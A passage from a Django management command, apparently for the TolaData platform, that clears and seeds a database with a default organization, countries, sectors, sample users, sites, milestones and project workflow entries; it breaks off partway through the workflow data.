# -*- coding: utf-8 -*-
from cStringIO import StringIO
import json
import logging
import os
from urlparse import urljoin
from django.conf import settings
from django.contrib.sites.models import Site
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.core.management import call_command
from django.core.management.base import BaseCommand
from django.db import transaction, IntegrityError, connection
import requests
import factories
from indicators.models import (Level, Frequency, Indicator, PeriodicTarget,
CollectedData, SiteProfile)
from workflow.models import (
ROLE_VIEW_ONLY, ROLE_ORGANIZATION_ADMIN, ROLE_PROGRAM_ADMIN,
ROLE_PROGRAM_TEAM, Organization, Country, TolaUser, Group, Sector,
Stakeholder, Milestone, WorkflowLevel1, WorkflowLevel2,
WorkflowLevel1Sector, WorkflowTeam, Internationalization)
logger = logging.getLogger(__name__)
DEFAULT_WORKFLOW_LEVEL_1S = [ # tuple (id, name)
(3, 'Humanitarian Response to the Syrian Crisis'),
(6, u'Bildung für sozial benachteiligte Kinder in Deutschland'),
]
DEFAULT_ORG = {
'id': 1,
'name': settings.DEFAULT_ORG,
'oauth_domains': settings.DEFAULT_OAUTH_DOMAINS.split(',')
}
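# A minimal sketch of the settings assumed above (values are illustrative,
# not taken from the project's actual settings.py):
#   DEFAULT_ORG = 'TolaData'
#   DEFAULT_OAUTH_DOMAINS = 'toladata.com,toladata.io'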
DEFAULT_COUNTRY_CODES = ('DE', 'SY')
class Command(BaseCommand):
help="""
Loads initial factories data.
By default, a new default organization will be created, plus countries,
groups, sectors and indicator types.
Passing a --demo flag will populate the database with extra sample projects,
activities, indicators, workflowteams etc. As a pre-condition for it to
work, all affected tables except organization, countries, groups and sectors
should be empty. Otherwise the command will exit with an error and no
new data will be added to the database.
"""
APPS = ('workflow', 'formlibrary', 'search')
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
# Note: the lists below are padded with an empty first element so that an
# object's id matches its list position, which keeps the code readable
# during development.
self._organization = None
self._groups = ['']
self._country_germany = None
self._country_syria = None
self._sectors = ['']
self._tolauser_andrew = None
self._users = []
self._tolauser_ninette = None
self._site_profiles = ['']
self._workflowlevel1s = ['']
self._workflowlevel2s = ['']
self._levels = ['']
self._frequencies = ['']
self._indicators = ['']
def _clear_database(self):
"""
Clears all old data except:
- Default organization
- Default countries
- Current registered users
Before anything is deleted, currently registered users are reassigned to
the default organization and given Germany as their country of residence.
"""
# Check integrity
try:
organization = Organization.objects.get(**DEFAULT_ORG)
except Organization.DoesNotExist:
msg = ("Error: the default organization could not be found in the "
"database. Maybe you are restoring without having run the "
"command a first time?")
logger.error(msg)
self.stderr.write("{}\n".format(msg))
raise IntegrityError(msg)
try:
country = Country.objects.get(code=DEFAULT_COUNTRY_CODES[0])
Country.objects.get(code=DEFAULT_COUNTRY_CODES[1])
except Country.DoesNotExist:
msg = ("Error: one or both of the default countries %s could not "
"be found in the database. Maybe you are restoring without "
"having run the command a first time?".format(
DEFAULT_COUNTRY_CODES))
logger.error(msg)
self.stderr.write("{}\n".format(msg))
raise IntegrityError(msg)
# Reassign organization and country for current registered users
TolaUser.objects.all().update(organization=organization,
country=country)
# Delete data - Kill 'Em All!
Organization.objects.exclude(id=DEFAULT_ORG['id']).delete()
Group.objects.all().delete()
Country.objects.exclude(code__in=DEFAULT_COUNTRY_CODES).delete()
Sector.objects.all().delete()
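# The .history managers below appear to come from django-simple-history;
# their historical records are deleted explicitly because deleting the
# model instances does not remove their history.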
SiteProfile.history.all().delete()
SiteProfile.objects.all().delete()
Stakeholder.objects.all().delete()
Milestone.objects.all().delete()
WorkflowLevel1.objects.all().delete()
WorkflowLevel2.history.all().delete()
WorkflowLevel2.objects.all().delete()
Level.objects.all().delete()
Frequency.objects.all().delete()
Indicator.history.all().delete()
Indicator.objects.all().delete()
PeriodicTarget.objects.all().delete()
CollectedData.history.all().delete()
CollectedData.objects.all().delete()
WorkflowLevel1Sector.objects.all().delete()
WorkflowTeam.objects.all().delete()
Internationalization.objects.all().delete()
def _create_organization(self):
try:
self._organization = Organization.objects.get(**DEFAULT_ORG)
except Organization.DoesNotExist:
self._organization = factories.Organization(
id=DEFAULT_ORG['id'],
name=DEFAULT_ORG['name'],
organization_url="http://toladata.com",
level_2_label="Project",
level_3_label="Activity",
level_4_label="Component",
oauth_domains=DEFAULT_ORG['oauth_domains'],
)
def _create_site(self):
site = Site.objects.get(id=1)
site.domain = 'toladata.io'
site.name = 'API'
site.save()
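# get_current_site(None) has no request to inspect, so it falls back to
# Site.objects.get_current(), i.e. the site referenced by settings.SITE_ID
# (the record updated above).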
factories.TolaSites(site=get_current_site(None))
def _create_groups(self):
self._groups.append(factories.Group(
id=1,
name=ROLE_VIEW_ONLY,
))
self._groups.append(factories.Group(
id=2,
name=ROLE_ORGANIZATION_ADMIN,
))
self._groups.append(factories.Group(
id=3,
name=ROLE_PROGRAM_ADMIN,
))
self._groups.append(factories.Group(
id=4,
name=ROLE_PROGRAM_TEAM,
))
def _create_countries(self):
factories.Country(
country="Afghanistan",
code="AF",
latitude="34.5333",
longitude="69.1333",
)
factories.Country(
country="Pakistan",
code="PK",
latitude="33.6667",
longitude="73.1667",
)
factories.Country(
country="Jordan",
code="JO",
latitude="31.9500",
longitude="35.9333",
)
factories.Country(
country="Lebanon",
code="LB",
latitude="33.9000",
longitude="35.5333",
)
factories.Country(
country="Ethiopia",
code="ET",
latitude="9.0167",
longitude="38.7500",
)
factories.Country(
country="Timor-Leste",
code="TL",
latitude="-8.3",
longitude="125.5667",
)
factories.Country(
country="Kenya",
code="KE",
latitude="-1.2833",
longitude="36.8167",
)
factories.Country(
country="Iraq",
code="IQ",
latitude="33.3333",
longitude="44.4333",
)
factories.Country(
country="Nepal",
code="NP",
latitude="26.5333",
longitude="86.7333",
)
factories.Country(
country="Mali",
code="ML",
latitude="17.6500",
longitude="0.0000",
)
factories.Country(
country="United States",
code="US",
latitude="45",
longitude="-120",
)
factories.Country(
country="Turkey",
code="TR",
latitude="39.9167",
longitude="32.8333",
)
self._country_syria = factories.Country(
country="Syrian Arab Republic",
code="SY",
latitude="33.5000",
longitude="36.3000",
)
factories.Country(
country="China",
code="CN",
)
factories.Country(
country="India",
code="IN",
)
factories.Country(
country="Indonesia",
code="ID",
)
factories.Country(
country="Mongolia",
code="MN",
)
factories.Country(
country="Myanmar",
code="MY",
latitude="21.9162",
longitude="95.9560",
)
factories.Country(
country="Palestine",
code="PS",
latitude="31.3547",
longitude="34.3088",
)
factories.Country(
country="South Sudan",
code="SS",
latitude="6.8770",
longitude="31.3070",
)
factories.Country(
country="Uganda",
code="UG",
latitude="1.3733",
longitude="32.2903",
)
self._country_germany = factories.Country(
country="Germany",
code="DE",
latitude="51.1657",
longitude="10.4515",
)
def _create_sectors(self):
self._sectors.append(factories.Sector(
id="1", # 129
sector="Agriculture",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="2", # 131
sector="Agribusiness",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="3", # 132
sector="Fisheries",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="4", # 133
sector="Basic Needs",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="5", # 134
sector="Basic Health Care",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="6", # 135
sector="Basic Health Infrastructure",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="7", # 136
sector="Basic Nutrition",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="8", # 137
sector="Basic Life Skills For Youth",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="9", # 138
sector="Basic Drinking Water Supply And Basic Sanitation",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="10", # 139
sector="Basic Sanitation",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="11", # 140
sector="Basic Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="12", # 141
sector="Capacity development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="13", # 142
sector="Child Health & Nutrition",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="14", # 143
sector="Emergency Response",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="15", # 144
sector="Climate Change Adaptation & Disaster Risk Reduction",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="16", # 145
sector="Climate Change Adaptation",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="17", # 146
sector="Disaster Risk Reduction",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="18", # 147
sector="Resilience",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="19", # 148
sector="Conflict Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="20", # 149
sector="Peacebuilding",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="21", # 150
sector="Conflict Prevention And Resolution",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="22", # 151
sector="Early Recovery",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="23", # 152
sector="Economic Recovery and Livelihoods",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="24", # 153
sector="Basic Infrastructure Restoration",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="25", # 154
sector="Economic and Market Development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="26", # 155
sector="Private Sector Development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="27", # 156
sector="Employment Opportunities",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="28", # 157
sector="Livelihood Improvement",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="29", # 158
sector="Enterprise Development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="30", # 159
sector="Entrepreneurship",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="31", # 160
sector="Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="32", # 161
sector="Primary Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="33", # 162
sector="Secondary Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="34", # 163
sector="Post-Secondary Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="35", # 164
sector="Vocational Training",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="36", # 165
sector="Informal Education/Life skills",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="37", # 166
sector="Shelter",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="38", # 167
sector="Non-food Items (NFI)",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="39", # 168
sector="Fuel/Energy",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="40", # 169
sector="Social Support",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="41", # 170
sector="Information Dissemination",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="42", # 171
sector="Energy",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="43", # 172
sector="Access to Electricity",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="44", # 173
sector="Access to Clean Cooking Facilities",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="45", # 174
sector="Energy Efficiency",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="46", # 175
sector="Renewable Energy",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="47", # 176
sector="Financial services",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="48", # 177
sector="Financial Services",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="49", # 178
sector="Financial Inclusion",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="50", # 179
sector="Cash for Work",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="51", # 180
sector="Food Security",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="52", # 181
sector="Food Assistance",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="53", # 182
sector="Food Access",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="54", # 183
sector="Food Availability",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="55", # 184
sector="Agriculture and Livestock",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="56", # 185
sector="Gender",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="57", # 186
sector="Governance",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="58", # 187
sector="Democratic Participation And Civil Society",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="59", # 188
sector="Education Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="60", # 189
sector="Water Sector Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="61", # 190
sector="Fishing Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="62", # 191
sector="Agricultural Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="63", # 192
sector="Health Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="64", # 193
sector="Population Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="65", # 194
sector="Public Sector Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="66", # 195
sector="Social Protection And Welfare Services Policy, Planning And Administration",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="67", # 196
sector="Employment Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="68", # 197
sector="Housing Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="69", # 198
sector="Transport Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="70", # 199
sector="Communications Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="71", # 200
sector="Energy Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="72", # 201
sector="Financial Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="73", # 202
sector="Rural Land Policy And Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="74", # 203
sector="Urban Land Policy And Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="75", # 204
sector="Environmental Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="76", # 205
sector="Tourism Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="77", # 206
sector="Trade Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="78", # 207
sector="Construction Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="79", # 208
sector="Mineral/Mining Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="80", # 209
sector="Industrial Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="81", # 210
sector="Health",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="82", # 211
sector="General Clinical Services",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="83", # 212
sector="Maternal Health and Newborn Care",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="84", # 213
sector="Child Healh",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="85", # 214
sector="Sexual Violence",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="86", # 215
sector="Psychosocial support",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="87", # 216
sector="Infectious Diseases",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="88", # 217
sector="Human rights",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="89", # 218
sector="Information Dissemination and Knowledge Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="90", # 219
sector="Infrastructure",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="91", # 220
sector="Water supply Infrastructure",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="92", # 221
sector="Natural Resource Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="93", # 222
sector="Water Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="94", # 223
sector="Land Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="95", # 224
sector="Nutrition",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="96", # 225
sector="Infant Feeding",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="97", # 226
sector="Protection",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="98", # 227
sector="Child Protection",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="99", # 228
sector="Gender-Based Violence",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="100", # 229
sector="Housing Land and Property",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="101", # 230
sector="Water, Sanitation, and Hygiene (WASH)",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="102", # 231
sector="Water Supply",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="103", # 232
sector="Hygiene Promotion",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="104", # 233
sector="Excreta Disposal",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="105", # 234
sector="Solid Waste Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="106", # 235
sector="Youth Development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="107", # 236
sector="Malnutrition Prevention",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="108", # 237
sector="Micronutrient Deficiency Prevention",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="109",
sector="Children's Rights",
organization=self._organization,
))
def _create_indicator_types(self):
factories.IndicatorType(
id=1,
indicator_type="Custom",
organization=self._organization,
)
factories.IndicatorType(
id=2,
indicator_type="Donor",
organization=self._organization,
)
factories.IndicatorType(
id=3,
indicator_type="Standard",
organization=self._organization,
)
def _create_users(self):
self._tolauser_andrew = factories.TolaUser(
# id=9
name="Andrew Ham",
user=factories.User(first_name="Andrew", last_name="Ham"),
organization=self._organization,
country=self._country_germany,
)
self._tolauser_ninette = factories.TolaUser(
# id=11
name="Ninette Dedikari",
user=factories.User(first_name="Ninette", last_name="Dedikari"),
organization=self._organization,
country=self._country_germany,
)
def _create_site_profiles(self):
self._site_profiles.append(factories.SiteProfile(
id=1, # 5
name="Medical Center 1 - Damascus",
country=self._country_syria, # 14
latitude="33.500",
longitude="36.300",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=2, # 6
name="Medical Center 2 - Aleppo",
country=self._country_syria, # 14
latitude="36.2130824982",
longitude="37.1569335937",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=3, # 7
name="Medical Center 3 - Hamma",
country=self._country_syria, # 14
latitude="35.1421960686",
longitude="36.7504394531",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=4, # 8,
name="Medical Center 4 - Tartus",
country=self._country_syria, # 14
latitude="34.8959",
longitude="35.8867",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=5, # 9
name="Medical Center 5 - Homs",
country=self._country_syria, # 14
latitude="34.7369225399",
longitude="36.7284667969",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=6,
name="Paul Schule",
country=self._country_germany,
latitude="50.9692657293000000",
longitude="6.9889383750000000",
created_by=self._tolauser_ninette.user,
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=7,
name="Peter Schule",
country=self._country_germany,
latitude="49.4507464458000000",
longitude="11.0319071250000000",
created_by=self._tolauser_ninette.user,
organization=self._organization,
))
def _create_stakeholders(self):
factories.Stakeholder(
id=1, # 2
name="Municipal Government Official",
role="Bulk Transport Services",
country=self._country_syria, # 14
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
def _create_milestones(self):
factories.Milestone(
id="1",
name="1. Identification and Design",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="2",
name="2. Setup and Planning",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="3",
name="3. Implementation",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="4",
name="4. Close Out",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="5",
name=u"Auswahl Schulen",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="6",
name=u"Durchführung Ideen Workshops",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="7",
name=u"Familien Fortbildungen",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="8",
name=u"Qualifizierung Lehrer",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
def _create_workflow_1s(self):
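# Note: list-valued kwargs such as country, milestone and user_access are
# presumably handled by factory_boy post-generation hooks that populate the
# corresponding many-to-many relations after the WorkflowLevel1 is created.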
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=1, # 10
name='Financial Assistance and Building Resilience in Conflict Areas',
funding_status="Funded",
organization=self._organization,
description="<p>Build resilience among affected communities through improving access to finance</p>",
country=[],
start_date="2017-07-01T10:00:00Z", # TODO use current date?
end_date="2019-06-30T10:00:00Z", # TODO +2y?
user_access=[self._tolauser_andrew], # 9
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=2, # 11
name='Population Health Initiative',
organization=self._organization,
description="<p>Build resilience among affected communities through improving access to finance</p>",
country=[],
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
user_access=[self._tolauser_ninette], # 11
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=3, # 15
name='Humanitarian Response to the Syrian Crisis',
funding_status="Funded",
organization=self._organization,
description="<p>Newly funded program</p>",
country=[self._country_syria], # 14
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
milestone=[1, 2, 3, 4],
user_access=[self._tolauser_andrew], # 9
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=4, # 18
name='Institutional Learning Initiative',
organization=self._organization,
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=5, # 19
name='Building resilience in Mali',
organization=self._organization,
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=6,
name=u'Bildung für sozial benachteiligte Kinder in Deutschland',
organization=self._organization,
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
milestone=[5, 6, 7, 8],
))
def _create_workflow_2s(self):
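# parent_workflowlevel2=0 marks a top-level entry; non-zero values reference
# the id of the parent WorkflowLevel2 created earlier in this method.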
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=1, # 2
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=0,
name='Planning: How to map out a project',
expected_start_date="2018-01-01T11:00:00Z", # TODO
expected_end_date="2018-01-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=2, # 3
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Determine the real problem to solve',
expected_start_date="2018-01-15T11:00:00Z", # TODO
expected_end_date="2018-01-19T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=3, # 4
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Identify Stakeholders',
expected_start_date="2017-12-20T11:00:00Z", # TODO
expected_end_date="2018-01-26T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=4, # 5
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Define project objectives',
expected_start_date="2018-01-01T11:00:00Z", # TODO
expected_end_date="2018-01-05T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=5, # 6
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Determine scope, resources and major tasks',
expected_start_date="2018-01-08T11:00:00Z", # TODO
expected_end_date="2018-01-12T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=6, # 7
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Prepare for trade-offs',
expected_start_date="2018-01-29T11:00:00Z", # TODO
expected_end_date="2018-01-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=7, # 8
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=0,
name='Build-up: How to get the project started',
expected_start_date="2017-11-01T11:00:00Z", # TODO
expected_end_date="2017-12-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
site=[self._site_profiles[1], self._site_profiles[2], self._site_profiles[3], self._site_profiles[4], self._site_profiles[5]], # [5, 6, 7, 8, 9]
stakeholder=[1], # 2
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=8, # 9
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Assemble your team',
expected_start_date="2017-11-01T11:00:00Z", # TODO
expected_end_date="2017-11-10T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=9, # 10
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Plan assignments',
expected_start_date="2017-12-01T11:00:00Z", # TODO
expected_end_date="2017-12-08T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=10, # 11
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Create the schedule',
expected_start_date="2017-11-13T11:00:00Z", # TODO
expected_end_date="2017-11-17T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=11, # 12
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Hold a kickoff meeting',
expected_start_date="2017-11-27T11:00:00Z", # TODO
expected_end_date="2017-11-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=12, # 13
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Develop a budget',
expected_start_date="2017-11-20T11:00:00Z", # TODO
expected_end_date="2017-11-24T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=13, # 14
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=0,
name='Implementation: How to execute the project',
expected_start_date="2018-02-01T11:00:00Z", # TODO
expected_end_date="2018-08-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=14, # 15
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=13, # 14
name='Monitor and control progress and budget',
expected_start_date="2018-04-02T11:00:00Z", # TODO
expected_end_date="2018-08-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=15, # 16
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=13, # 14
name='Report progress',
expected_start_date="2018-06-01T11:00:00Z", # TODO
expected_end_date="2018-08-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=16, # 17
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=13, # 14
name='Hold weekly team meetings',
description="<p>Weekly meetings held every Monday</p>",
expected_start_date="2018-02-01T11:00:00Z", # TODO
expected_end_date="2018-04-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=17, # 18
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=13, # 14
name='Manage problems',
expected_start_date="2018-02-01T11:00:00Z", # TODO
expected_end_date="2018-08-31T11:00:00Z", # TODO
